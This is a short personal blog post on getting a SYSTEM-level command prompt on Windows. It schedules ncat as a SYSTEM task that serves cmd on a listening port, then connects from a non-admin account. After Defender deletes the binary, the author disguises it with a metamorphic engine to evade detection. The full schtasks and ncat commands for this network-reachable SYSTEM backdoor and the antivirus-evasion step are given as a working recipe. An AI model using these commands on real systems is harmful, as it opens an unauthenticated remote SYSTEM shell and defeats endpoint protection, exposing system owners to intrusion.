Command prompt with System rights using Schtasks, Ncat and Metame
This is nothing new, but it might be new to someone. Sometimes I just want to run a command prompt as system. There is always “psexec -i -s cmd” from sysinternals but I always like to know how to do things multiple ways. This is just another way.
I’m scheduling a task as admin. At first, I just used the stand alone ncat.exe from nmap.org. I got it here:
http://nmap.org/dist/ncat-portable-5.59BETA1.zip
I schedule a task to run as system. I must be running command prompt as admin to do this. The key is I’m specifying the user as “SYSTEM” with “/RU SYSTEM” no password is required I am already running command prompt at admin level but not with system rights… YET 😊
Schtasks /create /RU SYSTEM /SC weekly /D SAT /TN IAmRoot /TR "C:\temp\ncat.exe -e cmd -l -p 40000" /ST 10:00:00Schtasks /run /TN IAmRoot
When I connected to it using this command “Ncat 10.10.10.196 40000”, it initially works. However, a few minutes later defender came a long and stomped on the exe as you can see in my screen shot.
Not to be out done I ran ncat.exe through metame. According to the Github Repo site, (https://github.com/a0rtega/metame ) “metame is a simple metamorphic code engine for arbitrary executables.”
I copied over the rebuilt executable and rescheduled it and ran it.
Schtasks /create /RU SYSTEM /SC weekly /D SAT /TN IAmRoot /TR "C:\temp\morphedncat -e cmd -l -p 40000" /ST 10:00:00Schtasks /run /TN IAmRoot
In the second window I’m starting off as Joe User with no admin rights. I connect to the morphed version of netcat and them I’m running with SYSTEM rights. So far Defender hasn’t complained but it is always cat an mouse.
Anyway, I hope that is helpful to someone else. Feel free to follow me on Twitter (@_markmo_) https://twitter.com/_markmo_
